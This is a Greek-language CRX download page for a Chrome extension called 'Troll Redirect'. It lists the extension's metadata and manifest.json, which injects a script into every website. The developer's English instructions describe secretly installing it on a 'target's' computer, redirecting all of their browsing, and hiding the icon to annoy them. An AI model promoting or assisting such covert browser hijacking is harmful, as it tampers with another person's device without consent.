Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Τι είναι το Troll Redirect;

Το Troll Redirect είναι ένα πρόσθετο Chrome που αναπτύχθηκε από τον Aaron Lockhart, και η κύρια λειτουργία του είναι "Redirect all of your friend's webpages automatically by installing this on their computer!".

Στιγμιότυπα Επέκτασης

screenshot

Λήψη αρχείου CRX της επέκτασης Troll Redirect

Λήψη αρχείων επέκτασης Troll Redirect σε μορφή crx, εγκατάσταση των επεκτάσεων Chrome μη αυτόματα στον περιηγητή ή κοινοποίηση των αρχείων crx με φίλους για εύκολη εγκατάσταση των επεκτάσεων Chrome.

Οδηγίες Χρήσης της Επέκτασης

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Βασικές Πληροφορίες Επέκτασης

Όνομα Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
Επίσημο URL https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Περιγραφή Redirect all of your friend's webpages automatically by installing this on their computer!
Μέγεθος Αρχείου 949 KB
Αριθμός Εγκαταστάσεων 192
Τρέχουσα Έκδοση 1.0
Τελευταία Ενημέρωση 2018-12-06
Ημερομηνία Δημοσίευσης 2018-12-02
Αξιολόγηση 4.75/5 Συνολικά 4 Αξιολογήσεις
Προγραμματιστής Aaron Lockhart
Ηλεκτρονικό ταχυδρομείο [email protected]
Τύπος Πληρωμής free
Υποστηριζόμενες Γλώσσες en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}